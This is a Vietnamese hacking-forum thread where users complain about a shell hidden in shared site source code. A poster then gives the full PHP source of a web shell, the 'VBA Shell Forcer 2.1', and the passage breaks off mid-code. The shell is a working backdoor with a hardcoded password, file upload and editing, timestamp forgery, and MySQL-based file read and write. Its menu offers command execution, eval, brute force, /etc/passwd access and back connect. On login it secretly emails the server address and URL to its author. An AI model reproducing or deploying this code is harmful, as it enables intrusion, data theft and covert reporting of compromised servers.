Bạn nào xài reg + vh của vudung vào đây đọc (vudung vào đọc luôn)

[mua_bien84]

Bỏ shell vô ai đem online mà k biết del shell thì mò vào phá

[trong0981]

rồi rồi chắc vũ dung k làm thế đâu
tính ông ấy hay mà

mình ko nói vudung hack của mình. nhưng vudung bỏ shell vào source khiến người khác lợi dụng hack của mình. bạn hiểu chứ. hôm qua mình bị khách hàng phàn nàn mất toi 2tr bạc chứ đâu có ít. hazz

[hai07dv]

Lục lọi file trong máy thấy 2 e trong images_file

Thôi hàng share ko check kỹ thì đành chịu vậy...người ta cũng đâu có bắt bạn phải xài hàng người ta đâu...

Chia buồn chủ top mất tiền oan

[HeavenGames]

VD & HDQB 2 in 1

[๑۩۞۩๑๑۩۞۩๑]

Tặng anh em nào bị dí thì coi fig nhé

PHP Code:

/****************************************\
|*    VBA SHELL FORCER - VERSION 2.1    *|
|*     Edit & Develop by VBATEAM        *|
|*        http://vbateam.net            *|
|*    ==  Hacking & Security  ==        *|
\****************************************/

error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);

foreach(array('_GET','_POST') as $_request) {
    foreach($$_request as $_key => $_value) {
        if ($_key{0} != '_') {
            if (IS_GPC) {
                $_value = s_array($_value);
            }
            $$_key = $_value;
        }
    }
}

/*=================  Info Login  ================*/
$admin = array();
$admin['check'] = true;
$admin['pass']  = 'byg'; // Password login
$admin['cookiepre'] = '';
$admin['cookiedomain'] = '';
$admin['cookiepath'] = '/';
$admin['cookielife'] = 86400;
/*===================== End =====================*/

if ($charset == 'utf8') {
    header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
    header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
    header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
    header("content-Type: text/html; charset=iso-8859-2");
}

$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();

/*===================== Login =====================*/
if ($action == "logout") {
    scookie('vbapass', '', -86400 * 365);
    p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
    p('<body background=black>');
    exit;
}
if($admin['check']) {
    if ($doing == 'login') {
        if ($admin['pass'] == $password) {
            scookie('vbapass', $password);

// Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = '[email protected]';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);
            p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
            p('<body bgcolor=black>
<BR><BR><div align=center><font color=yellow face=tahoma size=2>BYG - The Legend of Vietnamese Hacker World  - Please wait...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
            exit;
        }

    else
    {
    $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
echo $err_mess;
    }}
    if ($_COOKIE['vbapass']) {
        if ($_COOKIE['vbapass'] != $admin['pass']) {
            loginpage();
        }
    } else {
        loginpage();
    }
}
/*===================== Login =====================*/

$errmsg = '';

if ($action == 'phpinfo') {
    if (IS_PHPINFO) {
        phpinfo();
    } else {
        $errmsg = 'phpinfo() function has non-permissible';
    }
}


if ($doing == 'downfile' && $thefile) {
    if (!@file_exists($thefile)) {
        $errmsg = 'The file you want Downloadable was nonexistent';
    } else {
        $fileinfo = pathinfo($thefile);
        header('Content-type: application/x-'.$fileinfo['extension']);
        header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
        header('Content-Length: '.filesize($thefile));
        @readfile($thefile);
        exit;
    }
}


if ($doing == 'backupmysql' && !$saveasfile) {
    dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
    $table = array_flip($table);
    $result = q("SHOW tables");
    if (!$result) p('<h2>'.mysql_error().'</h2>');
    $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
    header('Content-type: application/unknown');
    header('Content-Disposition: attachment; filename='.$filename);
    $mysqldata = '';
    while ($currow = mysql_fetch_array($result)) {
        if (isset($table[$currow[0]])) {
            $mysqldata .= sqldumptable($currow[0]);
        }
    }
    mysql_close();
    exit;
}

// Mysql
if($doing=='mysqldown'){
    if (!$dbname) {
        $errmsg = 'Please input dbname';
    } else {
        dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
        if (!file_exists($mysqldlfile)) {
            $errmsg = 'The file you want Downloadable was nonexistent';
        } else {
            $result = q("select load_file('$mysqldlfile');");
            if(!$result){
                q("DROP TABLE IF EXISTS tmp_angel;");
                q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
                //Download SQL
                q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
                $result = q("select content from tmp_angel");
                q("DROP TABLE tmp_angel");
            }
            $row = @mysql_fetch_array($result);
            if (!$row) {
                $errmsg = 'Load file failed '.mysql_error();
            } else {
                $fileinfo = pathinfo($mysqldlfile);
                header('Content-type: application/x-'.$fileinfo['extension']);
                header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
                header("Accept-Length: ".strlen($row[0]));
                echo $row[0];
                exit;
            }
        }
    }
}

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title><?php echo str_replace('.','','BYG - The Legend of Vietnamese Hacker World');?></title>
<style type="text/css">
body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}

a {color: #74A202;text-decoration:none;}
a:hover{color: #f00;text-decoration:underline;}
.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
input, textarea, button
{
    font-size: 9pt;
    color: #ccc;
    font-family: verdana, sans-serif;
    background-color: #202020;
    border-left: 1px solid #74A202;
    border-top: 1px solid #74A202;
    border-right: 1px solid #74A202;
    border-bottom: 1px solid #74A202;
}
select
{
    font-size: 8pt;
    font-weight: normal;
    color: #ccc;
    font-family: verdana, sans-serif;
    background-color: #202020;
}

</style>
<script type="text/javascript">
function CheckAll(form) {
    for(var i=0;i<form.elements.length;i++) {
        var e = form.elements[i];
        if (e.name != 'chkall')
        e.checked = form.chkall.checked;
    }
}
function $(id) {
    return document.getElementById(id);
}
function goaction(act){
    $('goaction').action.value=act;
    $('goaction').submit();
}
</script>
</head>
<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>


<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
                <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
                    <tr>
                        <td align="center" valign=center>
                 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600"  align="center">
                   Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
                  </div>
                </td>
                    </tr>
                </table>
             </div>
 <script>
 var ld=(document.all);
  var ns4=document.layers;
 var ns6=document.getElementById&&!document.all;
 var ie4=document.all;
  if (ns4)
     ld=document.loading;
 else if (ns6)
     ld=document.getElementById("loading").style;
 else if (ie4)
     ld=document.all.loading.style;
  function init()
 {
 if(ns4){ld.visibility="hidden";}
 else if (ns6||ie4) ld.display="none";
 }
 </script>




<table width="100%" border="0" cellpadding="0" cellspacing="0">
    <tr class="head_small">
        <td  width=100%>
        <table width=100%><tr class="head_small"><td  width=86px><a title="BYG - The Legend of Vietnamese Hacker World" href="<?php $self;?>"><img src=http://cB8.upanh.com/19.0.24475887.LHg0/banner.gif height=86 border=0></a></td><td>
        <span style="float:left;"> <?php echo "Hostname: ".$_SERVER['HTTP_HOST']."";?>  | <a href="http://beyeugroup.com" target="_blank"><?php echo str_replace('.','','BYG - The Legend of Vietnamese Hacker World');?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />

        <?php
        $curl_on = @function_exists('curl_version');
        $mysql_on = @function_exists('mysql_connect');
        $mssql_on = @function_exists('mssql_connect');
        $pg_on = @function_exists('pg_connect');
        $ora_on = @function_exists('ocilogon');

echo (($safe_mode)?("Safe_mod: <b><font color=green>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));
echo "PHP version: <b>".@phpversion()."</b> - ";
        echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
        echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=green>ON</font></b> - "; } else { echo "<font color=red>OFF</font></b> - "; }
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}

echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}

echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";
        ?>
        </td></tr></table></td>
    </tr>
    <tr class="alt1">
        <td  width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";?> - Your IP: <?php echo "<font color=yellow>".$_SERVER['REMOTE_ADDR']."</font>";?>] </span>   <br />
--------------------------------------------------------------------------------------<br />
            
            <a href="javascript:goaction('file');">File Manager</a> |
            <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
            <a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> |
            <a href="javascript:goaction('shell');">Execute Command</a> |
            <a href="javascript:goaction('phpenv');">PHP Variable</a> |
            <a href="javascript:goaction('eval');">Eval PHP Code</a>
            <?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute</a> <?php }?>
            <?php if (!IS_WIN) {?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php }?>
            <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
        </td>
    </tr>
</table>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<?php

formhead(array('name'=>'goaction'));
makehide('action');
formfoot();

$errmsg && m($errmsg);

// Dir function
!$dir && $dir = '.';
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
    $dir = $dir.'/';
}
$uedir = ue($dir);

if (!$action || $action == 'file') {

    // Non-writeable
    $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';

    // Delete dir
    if ($doing == 'deldir' && $thefile) {
        if (!file_exists($thefile)) {
            m($thefile.' directory does not exist');
        } else {
            m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
        }
    }

    // Create new dir
    elseif ($newdirname) {
        $mkdirs = $nowpath.$newdirname;
        if (file_exists($mkdirs)) {
            m('Directory has already existed');
        } else {
            m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
            @chmod($mkdirs,0777);
        }
    }

    // Upload file
    elseif ($doupfile) {
        m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
    }

    // Edit file
    elseif ($editfilename && $filecontent) {
        $fp = @fopen($editfilename,'w');
        m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
        @fclose($fp);
    }

    // Modify
    elseif ($pfile && $newperm) {
        if (!file_exists($pfile)) {
            m('The original file does not exist');
        } else {
            $newperm = base_convert($newperm,8,10);
            m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
        }
    }

    // Rename
    elseif ($oldname && $newfilename) {
        $nname = $nowpath.$newfilename;
        if (file_exists($nname) || !file_exists($oldname)) {
            m($nname.' has already existed or original file does not exist');
        } else {
            m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
        }
    }

    // Copu
    elseif ($sname && $tofile) {
        if (file_exists($tofile) || !file_exists($sname)) {
            m('The goal file has already existed or original file does not exist');
        } else {
            m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
        }
    }

    // File exit
    elseif ($curfile && $tarfile) {
        if (!@file_exists($curfile) || !@file_exists($tarfile)) {
            m('The goal file has already existed or original file does not exist');
        } else {
            $time = @filemtime($tarfile);
            m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
        }
    }

    // Date
    elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
        if (!@file_exists($curfile)) {
            m(basename($curfile).' does not exist');
        } else {
            $time = strtotime("$year-$month-$day $hour:$minute:$second");
            m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
        }
    }

    // Download
    elseif($doing == 'downrar') {
        if ($dl) {
            $dfiles='';
            foreach ($dl as $filepath => $value) {
                $dfiles.=$filepath.',';
            }
            $dfiles=substr($dfiles,0,strlen($dfiles)-1);
            $dl=explode(',',$dfiles);
            $zip=new PHPZip($dl);
            $code=$zip->out;
            header('Content-type: application/octet-stream');
            header('Accept-Ranges: bytes');
            header('Accept-Length: '.strlen($code));
            header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
            echo $code;
            exit;
        } else {
            m('Please select file(s)');
        }
    }

    // Delete file
    elseif($doing == 'delfiles') {
        if ($dl) {
            $dfiles='';
            $succ = $fail = 0;
            foreach ($dl as $filepath => $value) {
                if (@unlink($filepath)) {
                    $succ++;
                } else {
                    $fail++;
                }
            }
            m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);
        } else {
            m('Please select file(s)');
        }
    }

    // Function Newdir
    formhead(array('name'=>'createdir'));
    makehide('newdirname');
    makehide('dir',$nowpath);
    formfoot();
    formhead(array('name'=>'fileperm'));
    makehide('newperm');
    makehide('pfile');
    makehide('dir',$nowpath);
    formfoot();
    formhead(array('name'=>'copyfile'));
    makehide('sname');
    makehide('tofile');
    makehide('dir',$nowpath);
    formfoot();
    formhead(array('name'=>'rename'));
    makehide('oldname');
    makehide('newfilename');
    makehide('dir',$nowpath);
    formfoot();
    formhead(array('name'=>'fileopform'));
    makehide('action');
    makehide('opfile');
    makehide('dir');
    formfoot();

    $free = @disk_free_space($nowpath);
    !$free && $free = 0;
    $all = @disk_total_space($nowpath);
    !$all && $all = 0;
    $used = $all-$free;
    $used_percent = @round(100/($all/$free),2);
    p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>'.sizecount($free).'</font> of <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');

?>
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  <form action="" method="post" id="godir" name="godir">
  <tr>
    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
    <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
    <td nowrap><input class="bt" value="GO" type="submit"></td>
  </tr>
  </form>
</table>
<script type="text/javascript">
function createdir(){
    var newdirname;
    newdirname = prompt('Please input the directory name:', '');
    if (!newdirname) return;
    $('createdir').newdirname.value=newdirname;
    $('createdir').submit();
}
function fileperm(pfile){
    var newperm;
    newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
    if (!newperm) return;
    $('fileperm').newperm.value=newperm;
    $('fileperm').pfile.value=pfile;
    $('fileperm').submit();
}
function copyfile(sname){
    var tofile;
    tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
    if (!tofile) return;
    $('copyfile').tofile.value=tofile;
    $('copyfile').sname.value=sname;
    $('copyfile').submit();
}
function rename(oldname){
    var newfilename;
    newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
    if (!newfilename) return;
    $('rename').newfilename.value=newfilename;
    $('rename').oldname.value=oldname;
    $('rename').submit();
}
function dofile(doing,thefile,m){
    if (m && !confirm(m)) {
        return;
    }
    $('filelist').doing.value=doing;
    if (thefile){
        $('filelist').thefile.value=thefile;
    }
    $('filelist').submit();
}
function createfile(nowpath){
    var filename;
    filename = prompt('Please input the file name:', '');
    if (!filename) return;
    opfile('editfile',nowpath + filename,nowpath);
}
function opfile(action,opfile,dir){
    $('fileopform').action.value=action;
    $('fileopform').opfile.value=opfile;
    $('fileopform').dir.value=dir;
    $('fileopform').submit();
}
function godir(dir,view_writable){
    if (view_writable) {
        $('godir').view_writable.value=1;
    }
    $('godir').dir.value=dir;
    $('godir').submit();
}
</script>
  <?php
    tbhead();
    p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
    p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
    p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
    if ($view_writable) {
        p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
    } else {
        p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
    }
    p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
    if (IS_WIN && IS_COM) {
        $obj = new COM('scripting.filesystemobject');
        if ($obj && is_object($obj)) {
            $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
            foreach($obj->Drives as $drive) {
                if ($drive->DriveType == 2) {
                    p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).' Free:'.sizecount($drive->FreeSpace).' Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
                } else {
                    p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
                }
            }
        }
    }

    p('</td></tr></form>');

    p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');

    // Get path
    $dirdata=array();
    $filedata=array();

    if ($view_writable) {
        $dirdata = GetList($nowpath);
    } else {
        // Open dir
        $dirs=@opendir($dir);
        while ($file=@readdir($dirs)) {
            $filepath=$nowpath.$file;
            if(@is_dir($filepath)){
                $dirdb['filename']=$file;
                $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
                $dirdb['dirchmod']=getChmod($filepath);
                $dirdb['dirperm']=getPerms($filepath);
                $dirdb['fileowner']=getUser($filepath);
                $dirdb['dirlink']=$nowpath;
                $dirdb['server_link']=$filepath;
                $dirdb['client_link']=ue($filepath);
                $dirdata[]=$dirdb;
            } else {
                $filedb['filename']=$file;
                $filedb['size']=sizecount(@filesize($filepath));
                $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
                $filedb['filechmod']=getChmod($filepath);
                $filedb['fileperm']=getPerms($filepath);
                $filedb['fileowner']=getUser($filepath);
                $filedb['dirlink']=$nowpath;
                $filedb['server_link']=$filepath;
                $filedb['client_link']=ue($filepath);
                $filedata[]=$filedb;
            }
        }// while
        unset($dirdb);
        unset($filedb);
        @closedir($dirs);
    }
    @sort($dirdata);
    @sort($filedata);
    $dir_i = '0';
    foreach($dirdata as $key => $dirdb){
        if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
            $thisbg = bg();
            p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
            p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
            p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
            p('<td nowrap>'.$dirdb['mtime'].'</td>');
            p('<td nowrap>--</td>');
            p('<td nowrap>');
            p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
            p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
            p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
            p('</tr>');
            $dir_i++;
        } else {
            if($dirdb['filename']=='..') {
                p('<tr class=fout>');
                p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
                p('</tr>');
            }
        }
    }

    p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
    p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
    makehide('action','file');
    makehide('thefile');
    makehide('doing');
    makehide('dir',$nowpath);
    $file_i = '0';
    foreach($filedata as $key => $filedb){
        if($filedb['filename']!='..' && $filedb['filename']!='.') {
            $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
            $thisbg = bg();
            p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
            p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
            p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
            p('<td nowrap>'.$filedb['mtime'].'</td>');
            p('<td nowrap>'.$filedb['size'].'</td>');
            p('<td nowrap>');
            p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
            p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
            p('<td nowrap>');
            p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
            p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
            p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
            p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
            p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
            p('</td></tr>');
            $file_i++;
        }
    }
    p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
    p('</form></table>');
}// end dir

elseif ($action == 'sqlfile') {
    if($doing=="mysqlupload"){
        $file = $_FILES['uploadfile'];
        $filename = $file['tmp_name'];
        if (file_exists($savepath)) {
            m('The goal file has already existed');
        } else {
            if(!$filename) {
                m('Please choose a file');
            } else {
                $fp=@fopen($filename,'r');
                $contents=@fread($fp, filesize($filename));
                @fclose($fp);
                $contents = bin2hex($contents);
                if(!$upname) $upname = $file['name'];
                dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
                $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
                m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
            }
        }
    }
?>
<script type="text/javascript">
function mysqlfile(doing){
    if(!doing) return;
    $('doing').value=doing;
    $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
    $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
    $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
    $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
    $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
    $('mysqlfile').charset.value=$('dbinfo').charset.value;
    $('mysqlfile').submit();
}
</script>
<?php
    !$dbhost && $dbhost = 'localhost';
    !$dbuser && $dbuser = 'root';
    !$dbport && $dbport = '3306';
    $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
    formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
    makehide('action','sqlfile');
    p('<p>');
    p('DBHost:');
    makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
    p(':');
    makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
    p('DBUser:');
    makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
    p('DBPass:');
    makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
    p('DBName:');
    makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
    p('DBCharset:');
    makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
    p('</p>');
    formfoot();
    p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
    p('<h2>Upload file</h2>');
    p('<p><b>This operation the DB user must has FILE privilege</b></p>');
    p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
    p('<h2>Download file</h2>');
    p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
    makehide('dbhost');
    makehide('dbport');
    makehide('dbuser');
    makehide('dbpass');
    makehide('dbname');
    makehide('charset');
    makehide('doing');
    makehide('action','sqlfile');
    p('</form>');
}

elseif ($action == 'sqladmin') {
    !$dbhost && $dbhost = 'localhost';
    !$dbuser && $dbuser = 'root';
    !$dbport && $dbport = '3306';
    $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
    if(isset($dbhost)){
        $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
    }
    if(isset($dbuser)) {
        $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
    }
    if(isset($dbpass)) {
        $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
    }
    if(isset($dbport)) {
        $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
    }
    if(isset($dbname)) {
        $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
    }
    if(isset($charset)) {
